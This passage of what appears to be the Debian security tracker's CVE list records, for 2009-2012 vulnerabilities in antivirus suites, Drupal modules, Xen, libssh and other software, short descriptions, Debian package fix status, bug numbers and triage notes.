10.00 ...) NOT-FOR-US: Anti virus snake oil CVE-2010-5160 (** DISPUTED ** Race condition in ESET Smart Security 4.2.35.3 on ...) NOT-FOR-US: Anti virus snake oil CVE-2010-5159 (** DISPUTED ** Race condition in Dr.Web Security Space Pro 6.0.0.03100 ...) NOT-FOR-US: Anti virus snake oil CVE-2010-5158 (** DISPUTED ** Race condition in DefenseWall Personal Firewall 3.00 on ...) NOT-FOR-US: Anti virus snake oil CVE-2010-5157 (Race condition in Comodo Internet Security before 4.1.149672.916 on ...) NOT-FOR-US: Comodo Internet Security CVE-2010-5156 (** DISPUTED ** Race condition in CA Internet Security Suite Plus 2010 ...) NOT-FOR-US: Anti virus snake oil CVE-2010-5155 (** DISPUTED ** Race condition in Blink Professional 4.6.1 on Windows ...) NOT-FOR-US: Anti virus snake oil CVE-2010-5154 (** DISPUTED ** Race condition in BitDefender Total Security 2010 ...) NOT-FOR-US: Anti virus snake oil CVE-2010-5153 (** DISPUTED ** Race condition in Avira Premium Security Suite ...) NOT-FOR-US: Anti virus snake oil CVE-2010-5152 (** DISPUTED ** Race condition in AVG Internet Security 9.0.791 on ...) NOT-FOR-US: Anti virus snake oil CVE-2010-5151 (** DISPUTED ** Race condition in avast! Internet Security 5.0.462 on ...) NOT-FOR-US: Anti virus snake oil CVE-2010-5150 (** DISPUTED ** Race condition in 3D EQSecure Professional Edition 4.2 ...) NOT-FOR-US: Anti virus snake oil CVE-2009-5132 (The Filtering Service in Websense Web Security and Web Filter before ...) NOT-FOR-US: Websense CVE-2009-5131 (The Receive Service in Websense Email Security before 7.1 does not ...) NOT-FOR-US: Websense CVE-2009-5130 (The Rules Service in Websense Email Security before 7.1 allows remote ...) NOT-FOR-US: Websense CVE-2009-5129 (The Websense V10000 appliance before 1.0.1 allows remote attackers to ...) NOT-FOR-US: Websense CVE-2009-5128 (The Websense V10000 appliance before 1.0.1 allows remote attackers to ...) NOT-FOR-US: Websense CVE-2009-5127 (The Antivirus component in Comodo Internet Security before ...) NOT-FOR-US: Comodo Internet Security CVE-2009-5126 (The Antivirus component in Comodo Internet Security before ...) NOT-FOR-US: Comodo Internet Security CVE-2009-5125 (Comodo Internet Security before 3.9.95478.509 allows remote attackers ...) NOT-FOR-US: Comodo Internet Security CVE-2009-5124 (The Antivirus component in Comodo Internet Security before ...) NOT-FOR-US: Comodo Internet Security CVE-2009-5123 (The Antivirus component in Comodo Internet Security before ...) NOT-FOR-US: Comodo Internet Security CVE-2012-4667 (Multiple cross-site scripting (XSS) vulnerabilities in SquidClamav 5.x ...) - squidclamav (bug #685398) CVE-2012-4606 RESERVED CVE-2011-5117 (Sophos SafeGuard Enterprise Device Encryption 5.x through 5.50.8.13, ...) NOT-FOR-US: Sophos SafeGuard CVE-2011-5116 (SQL injection vulnerability in setseed-hub in SetSeed CMS 5.8.20, ...) NOT-FOR-US: SetSeed CMS CVE-2011-5115 (Cross-site scripting (XSS) vulnerability in DLGuard, possibly 4.6 and ...) NOT-FOR-US: DLguard CVE-2011-5114 (Multiple cross-site scripting (XSS) vulnerabilities in the ...) NOT-FOR-US: DLguard CVE-2011-5113 (SQL injection vulnerability in frontend/models/techfoliodetail.php in ...) NOT-FOR-US: Joomla addon CVE-2011-5112 (SQL injection vulnerability in Alameda (com_alameda) component before ...) NOT-FOR-US: Joomla addon CVE-2011-5111 (Multiple SQL injection vulnerabilities in Kajian Website CMS Balitbang ...) NOT-FOR-US: Kajian Website CMS CVE-2011-5110 (Multiple SQL injection vulnerabilities in Blogs Manager 1.101 and ...) NOT-FOR-US: Blogs Manager CVE-2011-5109 (Multiple SQL injection vulnerabilities in Freelancer calendar 1.01 and ...) NOT-FOR-US: Freelancer calendar CVE-2011-5108 (Cross-site scripting (XSS) vulnerability in config.php in AdaptCMS ...) NOT-FOR-US: AdaptCMS CVE-2011-5107 (Cross-site scripting (XSS) vulnerability in post_alert.php in Alert ...) NOT-FOR-US: Wordpress plugin CVE-2011-5106 (Cross-site scripting (XSS) vulnerability in edit-post.php in the ...) NOT-FOR-US: Wordpress plugin CVE-2011-5105 (Multiple cross-site scripting (XSS) vulnerabilities in ...) NOT-FOR-US: ZOHO ManageEngine ADSelfService Plus CVE-2011-5104 (Cross-site scripting (XSS) vulnerability in ...) NOT-FOR-US: Wordpress plugin CVE-2011-5103 (SQL injection vulnerability in Alurian Prismotube PHP Video Script ...) NOT-FOR-US: Alurian Prismotube PHP Video Script CVE-2012-4605 (The default configuration of the SMTP component in Websense Email ...) NOT-FOR-US: Websense Email Security CVE-2012-4604 (The TRITON management console in Websense Web Security before 7.6 ...) NOT-FOR-US: Websense Web Security CVE-2012-4603 RESERVED CVE-2012-4602 (Multiple cross-site scripting (XSS) vulnerabilities in ...) NOT-FOR-US: Nicola Asuni TCExam CVE-2012-4601 (Multiple SQL injection vulnerabilities in Nicola Asuni TCExam before ...) NOT-FOR-US: Nicola Asuni TCExam CVE-2012-4600 (Cross-site scripting (XSS) vulnerability in Open Ticket Request System ...) - otrs2 3.1.7+dfsg1-5 CVE-2011-5102 (The Investigative Reports web interface in the TRITON management ...) NOT-FOR-US: Websense CVE-2010-5149 (Websense Web Security and Web Filter before 6.3.3 Hotfix 27 and 7.x ...) NOT-FOR-US: Websense CVE-2010-5148 (Websense Web Security and Web Filter before 7.1 Hotfix 21 do not set ...) NOT-FOR-US: Websense CVE-2010-5147 (The Remote Filtering component in Websense Web Security and Web Filter ...) NOT-FOR-US: Websense CVE-2010-5146 (The Remote Filtering component in Websense Web Security and Web Filter ...) NOT-FOR-US: Websense CVE-2010-5145 (The Filtering Service in Websense Web Security and Web Filter before ...) NOT-FOR-US: Websense CVE-2010-5144 (The ISAPI Filter plug-in in Websense Enterprise, Websense Web ...) NOT-FOR-US: Websense CVE-2009-5122 (The Personal Email Manager component in Websense Email Security before ...) NOT-FOR-US: Websense CVE-2009-5121 (Websense Email Security 7.1 before Hotfix 4 allows remote attackers to ...) NOT-FOR-US: Websense CVE-2009-5120 (The default configuration of Apache Tomcat in Websense Manager in ...) NOT-FOR-US: Websense CVE-2009-5119 (The default configuration of Apache Tomcat in Websense Manager in ...) NOT-FOR-US: Websense CVE-2008-7312 (The Filtering Service in Websense Enterprise 5.2 through 6.3 does not ...) NOT-FOR-US: Websense CVE-2012-4599 (McAfee SmartFilter Administration, and SmartFilter Administration Bess ...) NOT-FOR-US: McAfee SmartFilter Administration CVE-2012-4598 (An unspecified ActiveX control in McAfee Virtual Technician (MVT) ...) NOT-FOR-US: McAfee Virtual Technician CVE-2012-4597 (Cross-site scripting (XSS) vulnerability in McAfee Email and Web ...) NOT-FOR-US: McAfee Email and Web Security CVE-2012-4596 (Directory traversal vulnerability in McAfee Email Gateway (MEG) 7.0.0 ...) NOT-FOR-US: McAfee Email Gateway CVE-2012-4595 (McAfee Email and Web Security (EWS) 5.5 through Patch 6 and 5.6 ...) NOT-FOR-US: McAfee Email and Web Security CVE-2012-4594 (McAfee ePolicy Orchestrator (ePO) 4.6.1 and earlier allows remote ...) NOT-FOR-US: McAfee ePolicy Orchestrator CVE-2012-4593 (McAfee Application Control and Change Control 5.1.x and 6.0.0 do not ...) NOT-FOR-US: McAfee Application Control and Change Control CVE-2012-4592 (The Portal in McAfee Enterprise Mobility Manager (EMM) before 10.0 ...) NOT-FOR-US: McAfee Enterprise Mobility Manager CVE-2012-4591 (About.aspx in the Portal in McAfee Enterprise Mobility Manager (EMM) ...) NOT-FOR-US: McAfee Enterprise Mobility Manager CVE-2012-4590 (Multiple cross-site scripting (XSS) vulnerabilities in About.aspx in ...) NOT-FOR-US: McAfee Enterprise Mobility Manager CVE-2012-4589 (Login.aspx in the Portal in McAfee Enterprise Mobility Manager (EMM) ...) NOT-FOR-US: McAfee Enterprise Mobility Manager CVE-2012-4588 (McAfee Enterprise Mobility Manager (EMM) Agent before 4.8 and Server ...) NOT-FOR-US: McAfee Enterprise Mobility Manager CVE-2012-4587 (McAfee Enterprise Mobility Manager (EMM) Agent before 4.8 and Server ...) NOT-FOR-US: McAfee Enterprise Mobility Manager CVE-2012-4586 (McAfee Email and Web Security (EWS) 5.x before 5.5 Patch 6 and 5.6 ...) NOT-FOR-US: McAfee Email and Web Security CVE-2012-4585 (McAfee Email and Web Security (EWS) 5.x before 5.5 Patch 6 and 5.6 ...) NOT-FOR-US: McAfee Email and Web Security CVE-2012-4584 (McAfee Email and Web Security (EWS) 5.x before 5.5 Patch 6 and 5.6 ...) NOT-FOR-US: McAfee Email and Web Security CVE-2012-4583 (McAfee Email and Web Security (EWS) 5.x before 5.5 Patch 6 and 5.6 ...) NOT-FOR-US: McAfee Email and Web Security CVE-2012-4582 (McAfee Email and Web Security (EWS) 5.x before 5.5 Patch 6 and 5.6 ...) NOT-FOR-US: McAfee Email and Web Security CVE-2012-4581 (McAfee Email and Web Security (EWS) 5.x before 5.5 Patch 6 and 5.6 ...) NOT-FOR-US: McAfee Email and Web Security CVE-2012-4580 (Cross-site scripting (XSS) vulnerability in McAfee Email and Web ...) NOT-FOR-US: McAfee Email and Web Security CVE-2012-4579 (Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin ...) - phpmyadmin 4:3.4.11.1-1 [squeeze] - phpmyadmin (Vulnerable code not present) CVE-2012-4578 (The geli encryption provider 7 before r239184 on FreeBSD 10 uses a ...) - freebsd-utils (only affects dev version of 10) NOTE: not sure if the bug is in the userland tool or in the kernel device CVE-2012-4577 (The Linux firmware image on (1) Korenix Jetport 5600 series ...) NOT-FOR-US: Korenix Jetport 5600 CVE-2012-4576 [freebsd privilege escalation] RESERVED - kfreebsd-8 8.3-6 (bug #694096) - kfreebsd-9 9.0-9 (bug #694097) - kfreebsd-10 (bug #694098) [squeeze] - kfreebsd-8 8.1+dfsg-8+squeeze4 CVE-2012-4575 (The add_database function in objects.c in the pgbouncer pooler 1.5.2 ...) - pgbouncer 1.5.2-4 CVE-2012-4574 (Pulp in Red Hat CloudForms before 1.1 uses world-readable permissions ...) NOT-FOR-US: Red Hat CloudForms CVE-2012-4573 (The v1 API in OpenStack Glance Grizzly, Folsom (2012.2), and Essex ...) - glance 2012.1.1-2 (bug #692641) CVE-2012-4572 RESERVED CVE-2012-4571 (Python Keyring 0.9.1 does not securely initialize the cipher when ...) - python-keyring 0.9.2-1 (bug #675379) [wheezy] - python-keyring 0.7.1-1+deb7u1 CVE-2012-4570 [sql injection] RESERVED - php-letodms-core 3.3.8-1 CVE-2012-4569 [multiple xss in 3.3.9] RESERVED - letodms 3.3.9+dfsg-1 CVE-2012-4568 [csrf] RESERVED - letodms 3.3.9+dfsg-1 CVE-2012-4567 [multiple xss in 3.3.8] RESERVED - letodms 3.3.9+dfsg-1 CVE-2012-4566 (The DTLS support in radsecproxy before 1.6.2 does not properly verify ...) {DSA-2573-1} - radsecproxy 1.6.2-1 CVE-2012-4565 (The tcp_illinois_info function in net/ipv4/tcp_illinois.c in the Linux ...) - linux 3.2.35-1 - linux-2.6 [squeeze] - linux-2.6 2.6.32-48 CVE-2012-4564 (ppm2tiff does not check the return value of the TIFFScanlineSize ...) {DSA-2575-1} - tiff3 (The tiff-tools package is only built from the tiff source package) - tiff 4.0.2-5 (bug #692345) CVE-2012-4563 (Cross-site scripting (XSS) vulnerability in Google Web Toolkit (GWT) ...) - gwt (bug #691900) [squeeze] - gwt (Vulnerable code not present) CVE-2012-4562 (Multiple integer overflows in libssh before 0.5.3 allow remote ...) {DSA-2577-1} - libssh 0.5.3-1 CVE-2012-4561 (The (1) publickey_make_dss, (2) publickey_make_rsa, (3) ...) {DSA-2577-1} - libssh 0.5.3-1 CVE-2012-4560 (Multiple buffer overflows in libssh before 0.5.3 allow remote ...) - libssh 0.5.3-1 [squeeze] - libssh (Vulnerable code not present) CVE-2012-4559 (Multiple double free vulnerabilities in the (1) agent_sign_data ...) {DSA-2577-1} - libssh 0.5.3-1 CVE-2012-4558 (Multiple cross-site scripting (XSS) vulnerabilities in the ...) {DSA-2637-1} - apache2 2.2.22-13 (low) CVE-2012-4557 (The mod_proxy_ajp module in the Apache HTTP Server 2.2.12 through ...) {DSA-2579-1} - apache2 2.2.22-1 CVE-2012-4556 (The token processing system (pki-tps) in Red Hat Certificate System ...) NOT-FOR-US: Red Hat Certificate System CVE-2012-4555 (The token processing system (pki-tps) in Red Hat Certificate System ...) NOT-FOR-US: Red Hat Certificate System CVE-2012-4554 (The OpenID module in Drupal 7.x before 7.16 allows remote OpenID ...) - drupal7 7.14-1.1 (bug #690817) - drupal6 (according to upstream) NOTE: http://drupal.org/node/1815912 CVE-2012-4553 (Drupal 7.x before 7.16 allows remote attackers to obtain sensitive ...) - drupal7 7.14-1.1 (bug #690817) - drupal6 (according to upstream) NOTE: http://drupal.org/node/1815912 CVE-2012-4552 (Stack-based buffer overflow in the error function in ssg/ssgParser.cxx ...) - plib 1.8.5-6 (low; bug #694810) [squeeze] - plib (Minor issue) CVE-2012-4551 (Use-after-free vulnerability in libunity-webapps before 2.4.1 allows ...) NOT-FOR-US: libunity-webapps CVE-2012-4550 (JBoss Enterprise Application Platform (aka JBoss EAP or JBEAP) before ...) - jbossas4 (Only builds a few libraries, not the full application server) CVE-2012-4549 (The processInvocation function in ...) - jbossas4 (Only builds a few libraries, not the full application server) CVE-2012-4548 (Argument injection vulnerability in syntax-highlighting.sh in cgit ...) - cgit (bug #515793) CVE-2012-4547 (Unspecified vulnerability in awredir.pl in AWStats before 7.1 has ...) - awstats NOTE: awredir.pl is not installed into the binary package CVE-2012-4546 (The default configuration for IPA servers in Red Hat Enterprise Linux ...) NOT-FOR-US: FreeIPA CVE-2012-4545 (The http_negotiate_create_context function in ...) {DSA-2592-1} - elinks 0.12~pre5-9 CVE-2012-4544 (The PV domain builder in Xen 4.2 and earlier does not validate the ...) {DSA-2636-1} - xen 4.1.3-4 (low; bug #688125) CVE-2012-4543 (Multiple cross-site scripting (XSS) vulnerabilities in Red Hat ...) NOT-FOR-US: Red Hat Certificate System CVE-2012-4542 (block/scsi_ioctl.c in the Linux kernel through 3.8 does not properly ...) - linux - linux-2.6 CVE-2012-4541 (Cross-site scripting (XSS) vulnerability in Piwik before 1.9 allows ...) - piwik (bug #506933) CVE-2012-4540 (Off-by-one error in the invoke function in ...) - icedtea-web 1.3.1-1 (bug #692608) NOTE: http://seclists.org/oss-sec/2012/q4/237 CVE-2012-4539 (Xen 4.0 through 4.2, when running 32-bit x86 PV guests on 64-bit ...) {DSA-2582-1} - xen 4.1.3-4 CVE-2012-4538 (The HVMOP_pagetable_dying hypercall in Xen 4.0, 4.1, and 4.2 does not ...) {DSA-2582-1} - xen 4.1.3-4 CVE-2012-4537 (Xen 3.4 through 4.2, and possibly earlier versions, does not properly ...) {DSA-2582-1} - xen 4.1.3-4 CVE-2012-4536 (The (1) domain_pirq_to_emuirq and (2) physdev_unmap_pirq functions in ...) - xen 4.1.3-4 [squeeze] - xen (Only affects 4.1.x) CVE-2012-4535 (Xen 3.4 through 4.2, and possibly earlier versions, allows local guest ...) {DSA-2582-1} - xen 4.1.3-4 CVE-2012-4534 (org/apache/tomcat/util/net/NioEndpoint.java in Apache Tomcat 6.x ...) - tomcat7 7.0.28-1 (bug #695251) - tomcat6 6.0.35-6 (bug #695250) CVE-2012-4533 (Cross-site scripting (XSS) vulnerability in the "extra" details in the ...) {DSA-2563-1} - viewvc 1.1.5-1.4 (low; bug #691062) CVE-2012-4532 (Cross-site scripting (XSS) vulnerability in ...) NOT-FOR-US: Joomla addon CVE-2012-4531 (Cross-site scripting (XSS) vulnerability in Joomla! 2.5.x before 2.5.7 ...) - joomla (bug #571794) CVE-2012-4530 (The load_script function in fs/binfmt_script.c in the Linux kernel ...) - linux 3.2.35-1 - linux-2.6 [squeeze] - linux-2.6 2.6.32-48 CVE-2012-4529 RESERVED - jbossas4 (Only builds a few libraries, not the full application server) CVE-2012-4528 (The mod_security2 module before 2.7.0 for the Apache HTTP Server ...) - modsecurity-apache 2.6.6-5 (bug #691146) - libapache-mod-security CVE-2012-4527 (Stack-based buffer overflow in mcrypt 2.6.8 and earlier allows ...) - mcrypt 2.6.8-1.3 (unimportant; bug #690924) NOTE: patch proposed by submitter at RH bugzilla is incorrect NOTE: Only occurs in cmdline parsing, no priv escalation. Only a security issue in constructed setups CVE-2012-4526 [XSS in password.php, incomplete fix for CVE-2012-4525] RESERVED - piwigo (incomplete fix not applied to Debian package) [squeeze] - piwigo (vulnerable code not present) CVE-2012-4525 [XSS in password.php] RESERVED - piwigo [squeeze] - piwigo (vulnerable code not present) CVE-2012-4524 [xlockmore bypass] RESERVED - xlockmore (low) CVE-2012-4523 (radsecproxy before 1.6.1 does not properly verify certificates when ...) {DSA-2573-1} - radsecproxy 1.6.2-1 CVE-2012-4522 (The rb_get_path_check function in file.c in Ruby 1.9.3 before ...) - ruby1.8 (Only affects 1.9.x, see bug #690670) - ruby1.9.1 1.9.3.194-3 (bug #690670) CVE-2012-4521 [rejected dupe assignment] REJECTED CVE-2012-4520 (The django.http.HttpRequest.get_host function in Django 1.3.x before ...) {DSA-2634-1} - python-django 1.4.2-1 (bug #691145) CVE-2012-4519 RESERVED NOT-FOR-US: Zenphoto CVE-2012-4518 (ibacm 1.0.7 creates files with world-writable permissions, which ...) NOT-FOR-US: ibacm CVE-2012-4517 (ibacm before 1.0.6 does not properly manage reference counts for ...) NOT-FOR-US: ibacm CVE-2012-4516 (librdmacm 1.0.16, when ibacm.port is not specified, connects to port ...) - librdmacm 1.0.16-1 (bug #690672) [squeeze] - librdmacm (Introduced in 1.0.12) [wheezy] - librdmacm 1.0.15-1+deb7u1 CVE-2012-4515 (Use-after-free vulnerability in khtml/rendering/render_replaced.cpp in ...) - kdebase (unimportant) - kde-baseapps (unimportant) NOTE: Konqueror not supported security-wise CVE-2012-4514 (rendering/render_replaced.cpp in Konqueror in KDE before 4.9.3 allows ...) - kdebase (unimportant) - kde-baseapps (unimportant) NOTE: Konqueror not supported security-wise CVE-2012-4513 (khtml/imload/scaledimageplane.h in Konqueror in KDE 4.7.3 allows ...) - kdebase (unimportant) - kde-baseapps (unimportant) NOTE: Konqueror not supported security-wise CVE-2012-4512 RESERVED - kdebase (unimportant) - kde-baseapps (unimportant) NOTE: Konqueror not supported security-wise CVE-2012-4511 (services/flickr/flickr.c in libsocialweb before 0.25.21 automatically ...) - libsocialweb 0.25.20-3.1 (low; bug #690675) [wheezy] - libsocialweb 0.25.20-2.1 CVE-2012-4510 (cups-pk-helper before 0.2.3 does not properly wrap the (1) cupsGetFile ...) {DSA-2562-1} - cups-pk-helper 0.2.3-1 CVE-2012-4509 RESERVED CVE-2012-4508 (Race condition in fs/ext4/extents.c in the Linux kernel before 3.4.16 ...) {DSA-2668-1} - linux 3.2.35-1 - linux-2.6 CVE-2012-4507 (The strchr function in procmime.c in Claws Mail (aka claws-mail) 3.8.1 ...) - claws-mail 3.8.1-2 (low; bug #690151) [squeeze] - claws-mail (Minor issue) [squeeze] - claws-mail 3.7.6-4+squeeze1 NOTE: http://www.thewildbeast.co.uk/claws-mail/bugzilla/show_bug.cgi?id=2743 NOTE: www.thewildbeast.co.uk/claws-mail/bugzilla/attachment.cgi?id=1165 CVE-2012-4506 (Directory traversal vulnerability in gitolite 3.x before 3.1, when ...) - gitolite (Only affects 3.x releases) NOTE: https://groups.google.com/forum/#!topic/gitolite/K9SnQNhCQ-0/discussion NOTE: https://github.com/sitaramc/gitolite/commit/f636ce3ba3e340569b26d1e47b9d9b62dd8a3bf2 CVE-2012-4505 (Heap-based buffer overflow in the px_pac_reload function in lib/pac.c ...) {DSA-2571-1} - libproxy 0.3.1-5.1 (bug #690376) CVE-2012-4504 (Stack-based buffer overflow in the url::get_pac function in url.cpp in ...) - libproxy (Vulnerable code not present) NOTE: 0.4-only issue, fixed in newest upstream 0.4.9 CVE-2012-4503 RESERVED CVE-2012-4502 RESERVED CVE-2012-4501 (Citrix Cloud.com CloudStack, and Apache CloudStack pre-release, allows ...) NOT-FOR-US: CloudStack CVE-2012-4500 (The Announcements module 6.x-1.x before 6.x-1.5 for Drupal allows ...) NOT-FOR-US: Drupal addon not packaged in Debian CVE-2012-4499 (The contact formatter page in the Email Field module 6.x-1.x before ...) NOT-FOR-US: Drupal addon not packaged in Debian CVE-2012-4498 (The Activism module 6.x-2.x before 6.x-2.1 for Drupal does not ...) NOT-FOR-US: Drupal addon not packaged in Debian CVE-2012-4497 (Cross-site scripting (XSS) vulnerability in the "3 slide gallery" in ...) NOT-FOR-US: Drupal addon not packaged in Debian CVE-2012-4496 (Cross-site scripting (XSS) vulnerability in the Custom Publishing ...) NOT-FOR-US: Drupal addon not packaged in Debian CVE-2012-4495 (The Mime Mail module 6.x-1.x before 6.x-1.1 for Drupal does not ...) NOT-FOR-US: Drupal addon not packaged in Debian CVE-2012-4494 (The Shibboleth authentication module 7.x-4.0 for Drupal does not ...) NOT-FOR-US: Drupal addon not packaged in Debian CVE-2012-4493 (Cross-site scripting (XSS) vulnerability in the administrative ...) NOT-FOR-US: Drupal addon not packaged in Debian CVE-2012-4492 (Multiple cross-site scripting (XSS) vulnerabilities in the Shorten ...) NOT-FOR-US: Drupal addon not packaged in Debian CVE-2012-4491 (The Monthly Archive by Node Type module 6.x for Drupal does not ...) NOT-FOR-US: Drupal addon not packaged in Debian CVE-2012-4490 (Multiple cross-site scripting (XSS) vulnerabilities in the Excluded ...) NOT-FOR-US: Drupal addon not packaged in Debian CVE-2012-4489 (Open redirect vulnerability in the securelogin_secure_redirect ...) NOT-FOR-US: Drupal addon not packaged in Debian CVE-2012-4488 (The Location module 6.x before 6.x-3.2 and 7.x before 7.x-3.0-alpha1 ...) NOT-FOR-US: Drupal addon not packaged in Debian CVE-2012-4487 (The Subuser module before 6.x-1.8 for Drupal does not properly check ...) NOT-FOR-US: Drupal addon not packaged in Debian CVE-2012-4486 (Cross-site request forgery (CSRF) vulnerability in the Subuser module ...) NOT-FOR-US: Drupal addon not packaged in Debian CVE-2012-4485 (Multiple cross-site scripting (XSS) vulnerabilities in the ...) NOT-FOR-US: Drupal addon not packaged in Debian CVE-2012-4484 (Cross-site scripting (XSS) vulnerability in the administrative ...) NOT-FOR-US: Drupal addon not packaged in Debian CVE-2012-4483 (The commons_discussion_views_default_views function in ...) NOT-FOR-US: Drupal addon not packaged in Debian CVE-2012-4482 (The Ubercart SecureTrading Payment Method module 6.x for Drupal does ...) NOT-FOR-US: Drupal addon not packaged in Debian CVE-2012-4481 (The safe-level feature in Ruby 1.8.7 allows context-dependent ...) - ruby1.8 1.8.7.358-5 (bug #689945) CVE-2012-4480 RESERVED NOT-FOR-US: mom CVE-2012-4479 (SQL injection vulnerability in the Drag & Drop Gallery module 6.x for ...) NOT-FOR-US: Drupal contributed-module CVE-2012-4478 (Cross-site request forgery (CSRF) vulnerability in the Drag & Drop ...) NOT-FOR-US: Drupal contributed-module CVE-2012-4477 (Unspecified vulnerability in the Drag & Drop Gallery module 6.x for ...) NOT-FOR-US: Drupal contributed-module CVE-2012-4476 (Cross-site scripting (XSS) vulnerability in the Drag & Drop Gallery ...) NOT-FOR-US: Drupal contributed-module CVE-2012-4475 (The Security Questions module for Drupal 6.x-1.x before 6.x-1.1 and ...) NOT-FOR-US: Drupal contributed-module CVE-2012-4474 (Multiple cross-site scripting (XSS) vulnerabilities in the Colorbox ...) NOT-FOR-US: Drupal contributed-module CVE-2012-4473 (The Restrict node page view module 7.x-1.x before 7.x-1.2 for Drupal ...) NOT-FOR-US: Drupal contributed-module CVE-2012-4472 (Unrestricted file upload vulnerability in upload.php in the Drag & ...) NOT-FOR-US: Drupal contributed-module CVE-2012-4471 (The Search Autocomplete module 7.x-2.x before 7.x-2.4 for Drupal does ...) NOT-FOR-US: Drupal contributed-module CVE-2012-4470 (The Listhandler module 6.x-1.x before 6.x-1.1 for Drupal does not ...) NOT-FOR-US: Drupal contributed-module CVE-2012-4469 (Cross-site scripting (XSS) vulnerability in the Hashcash module ...) NOT-FOR-US: Drupal contributed-module CVE-2012-4468 (Cross-site scripting (XSS) vulnerability in the Privatemsg module ...) NOT-FOR-US: Drupal contributed-module CVE-2012-4467 (The (1) do_siocgstamp and (2) do_siocgstampns functions in ...) - linux-2.6 (Vulnerable code introduced in 3.3) - linux (Vulnerable code introduced in 3.3) CVE-2012-4466 (Ruby 1.8.7 before patchlevel 371, 1.9.3 before patchlevel 286, and 2.0 ...) - ruby1.9.1 1.9.3.194-2 (low; bug #689075) [squeeze] - ruby1.9.1 (Minor issue) CVE-2012-4465 (Heap-based buffer overflow in the substr function in parsing.c in cgit ...) - cgit (bug #515793) CVE-2012-4464 (Ruby 1.9.3 before patchlevel 286 and 2.0 before revision r37068 allows ...) - ruby1.9.1 1.9.3.194-2 (low; bug #689075) [squeeze] - ruby1.9.1 (Introduced in 1.9.3) CVE-2012-4463 (Midnight Commander (mc) 4.8.5 does not properly handle the (1) ...) - mc (low; bug #689571) [wheezy] - mc (Minor issue) [squeeze] - mc (Minor issue) CVE-2012-4462 (aviary/jobcontrol.py in Condor, as used in Red Hat Enterprise MRG 2.3, ...) - condor (This bug only affects the Aviary contrib module, which isn't built in the Debian condor package, #690556) CVE-2012-4461 (The KVM subsystem in the Linux kernel before 3.6.9, when running on ...) {DSA-2668-1} - linux-2.6 - linux 3.2.35-1 CVE-2012-4460 (The serializing/deserializing functions in the qpid::framing::Buffer ...) - qpid-cpp CVE-2012-4459 (Integer overflow in the qpid::framing::Buffer::checkAvailable function ...) - qpid-cpp CVE-2012-4458 (The AMQP type decoder in Apache Qpid 0.20 and earlier allows remote ...) - qpid-cpp CVE-2012-4457 (OpenStack Keystone Essex before 2012.1.2 and Folsom before folsom-3 ...) - keystone 2012.1.1-9 (bug #689210) CVE-2012-4456 (The (1) OS-KSADM/services and (2) tenant APIs in OpenStack Keystone ...) - keystone 2012.1.1-9 (bug #689210) CVE-2012-4455 (openCryptoki 2.4.1 allows local users to create or set world-writable ...) - opencryptoki (low; bug #689417) [squeeze] - opencryptoki (Minor issue) [wheezy] - opencryptoki (Minor issue) CVE-2012-4454 (openCryptoki before 2.4.1, when using spinlocks, allows local users to ...) - opencryptoki (low; bug #689417) [squeeze] - opencryptoki (Minor issue) [wheezy] - opencryptoki (Minor issue) CVE-2012-4453 (dracut.sh in dracut, as used in Red Hat Enterprise Linux 6, Fedora 16 ...) - dracut 020-1.1 (low; bug #688956) [squeeze] - dracut (Minor issue) CVE-2012-4452 (MySQL 5.0.88, and possibly other versions and platforms, allows local ...) - mysql-dfsg-5.0 (Debian never included that 5.0.88 release) CVE-2012-4451 [php-ZendFramework: XSS vectors in multiple Zend Framework components ZF2012-03] RESERVED - zendframework (Vulnerable code introduced in 2.x, #688946) CVE-2012-4450 (389 Directory Server 1.2.10 does not properly update the ACL when a DN ...) - 389-ds-base 1.2.11.15-1 (bug #688942) NOTE: Upstream ticket https://fedorahosted.org/389/ticket/340 NOTE: Upstream patch http://git.fedorahosted.org/cgit/389/ds.git/commit/?id=5beb93d42efb807838c09c5fab898876876f8d09 CVE-2012-4449 RESERVED CVE-2012-4448 (Cross-site request forgery (CSRF) vulnerability in wp-admin/index.php ...) - wordpress 3.5.1+dfsg-2 (low; bug #689031) [squeeze] - wordpress (Minor issue) [wheezy] - wordpress (Minor issue) CVE-2012-4447 (Heap-based buffer overflow in tif_pixarlog.c in LibTIFF before 4.0.3 ...) {DSA-2561-1} - tiff 4.0.2-4 (bug #688944) - tiff3 3.9.6-9 (bug #688944) NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=860198 CVE-2012-4446 (The default configuration for Apache Qpid 0.20 and earlier, when the ...) - qpid-cpp CVE-2012-4445 (Heap-based buffer overflow in the eap_server_tls_process_fragment ...) {DSA-2557-1} - hostapd - wpa 1.0-3 (bug #689990) CVE-2012-4444 (The ip6_frag_queue function in net/ipv6/reassembly.c in the Linux ...) - linux 2.6.36-1~experimental.1 - linux-2.6 [squeeze] - linux-2.6 2.6.32-48 CVE-2012-4443 (Monkey HTTP Daemon 0.9.3 uses a real UID of root and a real GID of ...) - monkey (unimportant; bug #688008) CVE-2012-4442 (Monkey HTTP Daemon 0.9.3 retains the supplementary group IDs of the ...) - monkey (unimportant; bug #688007) NOTE: CVE-request http://www.openwall.com/lists/oss-security/2012/09/20/7 CVE-2012-4441 [jenkins XSS in CI game plugin] RESERVED - jenkins (Plugin not built in Debian source package) NOTE: http://www.cloudbees.com/jenkins-advisory/jenkins-security-advisory-2012-09-17.cb CVE-2012-4440 [jenkins XSS in Violations plugin] RESERVED - jenkins (Plugin not built in Debian source package) NOTE: http://www.cloudbees.com/jenkins-advisory/jenkins-security-advisory-2012-09-17.cb CVE-2012-4439 [jenkins XSS] RESERVED - jenkins 1.447.2+dfsg-2 (bug #688298) NOTE: http://www.cloudbees.com/jenkins-advisory/jenkins-security-advisory-2012-09-17.cb CVE-2012-4438 [jenkins remote code execution] RESERVED - jenkins 1.447.2+dfsg-2 (bug #688298) NOTE: http://www.cloudbees.com/jenkins-advisory/jenkins-security-advisory-2012-09-17.cb CVE-2012-4437 (Cross-site scripting (XSS) vulnerability in the SmartyException class ...) - smarty3 3.1.10-2 (bug #688153) - smarty (bug #702710) [squeeze] - smarty (Will be fixed in point update) NOTE: http://www.openwall.com/lists/oss-security/2012/09/19/1 NOTE: http://secunia.com/advisories/50589/ NOTE: http://code.google.com/p/smarty-php/source/browse/trunk/distribution/change_log.txt NOTE: http://code.google.com/p/smarty-php/source/detail?r=4658 NOTE: https://code.google.com/p/smarty-php/source/detail?r=4660 CVE-2012-4436 (Buffer overflow in the run_last_args function in client/fwknop.c in ...) - fwknop 2.0.3-1 (bug #688151) [squeeze] - fwknop (Vulnerable code not present) [wheezy] - fwknop 